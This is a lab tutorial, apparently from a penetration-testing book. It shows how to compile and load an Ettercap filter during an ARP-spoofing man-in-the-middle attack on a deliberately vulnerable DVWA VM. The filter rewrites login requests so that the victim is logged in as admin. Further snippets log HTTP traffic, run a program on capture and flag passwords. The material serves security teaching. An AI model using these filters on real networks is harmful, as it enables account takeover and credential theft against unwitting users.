When performing a MITM attack, we are able not only to listen to everything being sent between the victim systems but also to modify requests and responses and, thus, make them behave as we want.
In this recipe, we will use Ettercap filters to detect whether or not a packet contains the information we are interested in and to trigger the change operations.
- Our first step is to create a filter file. Save the following code in a text file (we will call it
regex-replace-filter.filter) as is shown here:# If the packet goes to vulnerable_vm on TCP port 80 (HTTP) if (ip.dst == '192.168.56.102'&& tcp.dst == 80) { # if the packet's data contains a login page if (search(DATA.data, "POST")){ msg("POST request"); if (search(DATA.data, "login.php") ){ msg("Call to login page"); # Will change content's length to prevent server from failing pcre_regex(DATA.data, "Content-Length: [0-9]*","Content-Length: 41"); msg("Content Length modified"); # will replace any username by "admin" using a regular expression if (pcre_regex(DATA.data, "username=[a-zA-Z]*&","username=admin&")) { msg("DATA modified "); } msg("Filter Ran. "); } } } - Next, we need to compile the filter for Ettercap to use it. From a terminal, run the following command:
etterfilter -o regex-replace-filter.ef regex-replace-filter.filter
- Now, from Ettercap's menu, select Filters | Load a filter, followed by
regex-replace-filter.efand click Open:We will see a new entry in Ettercap's log window indicating that the new filter has been loaded.
- In the windows client, browse to
http://192.168.56.102/dvwa/and log in as any user with the passwordadmin, for example:inexistentuser:admin.
The user is now logged in as an administrator and the attacker has a password that works for two users.
- If we check Ettercap's log, we can see all the messages we wrote in code displayed there, as shown:
An ARP spoofing attack is only the start of more complex attacks. In this recipe, we used the packet filtering capability of Ettercap to identify a packet with specific content and modified it to force the user to log in to the application as an administrator. This can also be done from server to client and can be used to trick the user by showing them fake information.
Our first step was to create the filtering script, which first checks if the packet being analyzed contains the information that identifies the one we want to alter, as illustrated:
if (ip.dst == '192.168.56.102'&& tcp.dst == 80) {If the destination IP is the one of the vulnerable_vm and the destination TCP port is 80 which is the default HTTP port, it is a request to the server we want to intercept.
if (search(DATA.data, "POST")){
msg("POST request");
if (search(DATA.data, "login.php") ){If the request is by the POST method and goes to the login.php page, it is a login attempt as that is the way our target application receives the login attempts.
pcre_regex(DATA.data, "Content-Length: [0-9]*","Content-Length: 41");
We used a regular expression to locate the Content-Length parameter in the request and replaced its value with 41, which is the length of the packet when we send a login with admin/admin credentials.
if (pcre_regex(DATA.data, "username=[a-zA-Z]*&","username=admin&")){
msg("DATA modified
");
}Again, using regular expressions, we look for the username's value in the request and replace it with admin.
The messages (msg) are only for tracing and debugging purposes and could be omitted from the script.
After writing the script, we compiled it with the etterfilter tool for Ettercap in order to process it. After that, we loaded it into Ettercap and then just waited for the client to connect.
Ettercap filters can be used for other things besides altering requests and responses, they can be used, for example, to log all HTTP traffic and execute a program when a packet is captured:
if (ip.proto == TCP) {
if (tcp.src == 80 || tcp.dst == 80) {
log(DATA.data, "./http-logfile.log");
exec("./program");
}
}They also display a message if a password has been intercepted:
if (search(DATA.data, "password=")) {
msg("Possible password found");
}